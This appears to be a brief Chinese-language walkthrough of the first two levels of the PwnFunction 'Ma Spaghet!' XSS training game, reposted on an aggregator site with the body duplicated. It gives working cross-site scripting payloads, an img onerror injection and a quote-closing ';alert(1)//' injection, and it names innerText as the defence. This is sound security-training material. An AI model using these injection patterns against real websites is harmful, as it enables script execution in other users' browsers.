一、環境
XSS Game - Ma Spaghet! | PwnFunction
二、開始闖關
第一關
看看代碼
試一下直接寫
?明顯進來了為什么不執行看看官方文檔吧
?你不執行那我就更改單標簽去使用唄
?somebody=<img%20src=1%20onerror="alert(1)">
?防御:
innerText
第二關
看看源碼:
考察一個基礎的閉合
?jeff=1";alert(1)//
?
后續待更新?
XSS Game - Ma Spaghet! | PwnFunction
看看代碼
試一下直接寫
?明顯進來了為什么不執行看看官方文檔吧
?你不執行那我就更改單標簽去使用唄
?somebody=<img%20src=1%20onerror="alert(1)">
?防御:
innerText
看看源碼:
考察一個基礎的閉合
?jeff=1";alert(1)//
?
后續待更新?
本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。 如若轉載,請注明出處:http://www.pswp.cn/news/710776.shtml 繁體地址,請注明出處:http://hk.pswp.cn/news/710776.shtml 英文地址,請注明出處:http://en.pswp.cn/news/710776.shtml
如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!